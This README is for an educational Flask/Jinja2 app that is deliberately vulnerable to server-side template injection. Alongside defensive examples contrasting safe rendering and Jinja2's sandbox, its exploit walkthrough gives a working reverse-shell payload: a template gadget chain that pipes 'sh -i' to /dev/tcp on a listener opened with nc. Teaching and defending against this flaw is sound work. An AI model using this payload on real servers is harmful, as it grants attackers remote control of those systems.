codestern/Kaindorf-Cafeteria
Kaindorf Cafeteria

Disclaimer

This project is intended for educational purposes only.
Its purpose is to raise awareness about web vulnerabilities, specifically Server-Side Template Injection (SSTI).
Any misuse of this information for unauthorized or malicious activities is strictly prohibited. Always ensure you have permission before testing any application for vulnerabilities.


Introduction

The purpose of this project is to inform visitors at the TdoT@HTBLA Kaindorf about the following web vulnerability: SSTI (Server-Side Template Injection).

Setup of the Project

To launch this project, you need to install the required dependencies. This can easily be done using the included requirements.txt file:

pip install -r requirements.txt

(Of course, it is recommended to use a virtual environment for this process.)

Once the dependencies are installed, you can run the application by either executing the app.py file:

python src/app.py

or by using Flask directly:

flask --app src/app.py run

After running one of these commands the application starts on Flask's development server, which listens on http://127.0.0.1:5000 by default; the startup output shows the actual address and port.

(Screenshot: home page)

How to Exploit

Since this app is designed to demonstrate a vulnerability, here is a quick guide on how to confirm the injection and then obtain a reverse shell on the running server.

As mentioned earlier, the primary vulnerability of this app is SSTI (Server-Side Template Injection). Since the app uses Jinja2 as its template engine, a basic payload to test the vulnerability would be:

{{7*7}}

(Screenshot: SSTI test)

In this example the page renders 49 instead of the literal text {{7*7}}: the input was compiled and evaluated by the template engine, which confirms the SSTI.
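To make the probe concrete, here is an added example (not code from the Kaindorf-Cafeteria app) of the Flask/Jinja2 pattern that causes SSTI, next to the corrected form, with the {{7*7}} test run against both. The template strings, function names and the probe helper are illustrative assumptions; the app's own route is not shown on this page.

```python
"""Added example (not the Kaindorf-Cafeteria code): the Jinja2 usage pattern
that produces SSTI, beside the fixed form, exercised with the {{7*7}} probe."""
from jinja2 import BaseLoader, Environment

# autoescape=True mirrors what Flask enables for .html templates. It does not
# prevent SSTI, because the injection lands in the template *source*, not in
# the rendered output.
env = Environment(loader=BaseLoader(), autoescape=True)

PROBE = "{{7*7}}"


def render_vulnerable(name: str) -> str:
    """Assumed bug pattern: user input is spliced into the template source
    before compilation, so Jinja2 parses and executes whatever it contains.
    In a Flask app this is render_template_string("Hello " + name + "!")."""
    template_source = "Hello " + name + "!"
    return env.from_string(template_source).render()


def render_safe(name: str) -> str:
    """Fix: the template source is a constant; user input is handed over as a
    context variable and is only ever treated as data (and HTML-escaped)."""
    return env.from_string("Hello {{ name }}!").render(name=name)


def is_ssti_probe_evaluated(renderer, probe: str = PROBE) -> bool:
    """The same check the README describes: if the arithmetic was evaluated,
    the input reached the template compiler."""
    return "49" in renderer(probe)


if __name__ == "__main__":
    for label, fn in (("vulnerable", render_vulnerable), ("safe", render_safe)):
        print(f"{label:10} -> {fn(PROBE)!r} (evaluated: {is_ssti_probe_evaluated(fn)})")
```

The vulnerable function returns "Hello 49!" while the safe one returns "Hello {{7*7}}!" unchanged; the difference is solely whether the input became part of the template source.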

Deploying a Reverse Shell

The next step is to deploy a reverse shell. Because Jinja2 SSTI is well documented, ready-made payloads exist; we start from the one provided by PayloadsAllTheThings:

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}

This payload walks from the template's self object, through the module globals of its __init__ method, to Python's builtins and __import__, which is how it reaches os even though os is not in the template context. Instead of running the id command, we will deploy a reverse shell. Before adjusting the payload, start a listener on your machine with the following command:

nc -lvnp 1337

Now, adjust the payload to look like this:

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('sh -i >& /dev/tcp/IP/1337 0>&1').read() }}

(Replace "IP" with the address of your listener.)

After submitting this through the vulnerable input, your listener should receive a shell, giving you control over the server. Two caveats: os.popen hands the command to /bin/sh -c, and the >& and /dev/tcp redirections are bash features, so on systems where /bin/sh is dash (Debian, Ubuntu) the command must be wrapped in bash -c (switch the outer Python string to double quotes so the inner single quotes survive). Also, .read() waits for the shell to exit, so the HTTP request hangs for as long as the reverse shell is open; that is expected.
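For the defensive side of this step, here is an added example (again not the project's code) that runs the same attribute chain the payload above uses against a plain Jinja2 Environment and against jinja2.sandbox.SandboxedEnvironment. The popen call is swapped for a harmless os.getcwd() so the chain can be exercised safely, and the vulnerable splicing pattern is kept on purpose so that the sandbox is the only control in play; the function names and the "Result:" template are assumptions made for the example.

```python
"""Added example (not the Kaindorf-Cafeteria code): the attribute walk behind
the README's reverse-shell payload, run against a plain Jinja2 Environment and
against SandboxedEnvironment. The os call is replaced by getcwd() to keep it
harmless."""
from jinja2 import BaseLoader, Environment
from jinja2.exceptions import SecurityError
from jinja2.sandbox import SandboxedEnvironment

# Same gadget chain as the README payload, minus the reverse shell:
# self -> TemplateReference.__init__ -> module globals -> builtins -> __import__
GADGET = "{{ self.__init__.__globals__.__builtins__.__import__('os').getcwd() }}"

plain_env = Environment(loader=BaseLoader())
sandbox_env = SandboxedEnvironment(loader=BaseLoader())


def render_untrusted(env: Environment, user_input: str) -> str:
    """Deliberately keeps the vulnerable pattern (input spliced into the
    template source) so only the environment decides what the input can do."""
    return env.from_string("Result: " + user_input).render()


def gadget_outcome(env: Environment) -> str:
    """'rce' if the chain reached os, 'blocked' if the sandbox refused an
    underscore-prefixed attribute (it raises SecurityError), 'empty' otherwise,
    so the two environments can be compared directly."""
    try:
        out = render_untrusted(env, GADGET)
    except SecurityError:
        return "blocked"
    return "rce" if out != "Result: " else "empty"


if __name__ == "__main__":
    print("plain environment  :", gadget_outcome(plain_env))
    print("sandbox environment:", gadget_outcome(sandbox_env))
    # The sandbox stops the gadget chain, but the template injection itself
    # is still there: arithmetic (and any other safe expression) still runs.
    print("sandbox with {{7*7}}:", render_untrusted(sandbox_env, "{{7*7}}"))
```

The sandbox refuses the first underscore-prefixed attribute (self.__init__) and the render aborts with SecurityError, while the plain environment happily returns the working directory. Note what the sandbox does not do: {{7*7}} still evaluates to 49, so the page is still injectable; the sandbox is defense in depth, and the real fix is to never concatenate user input into template source.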

About

A little Flask (+ Jinja2) application to demonstrate the risk of SSTI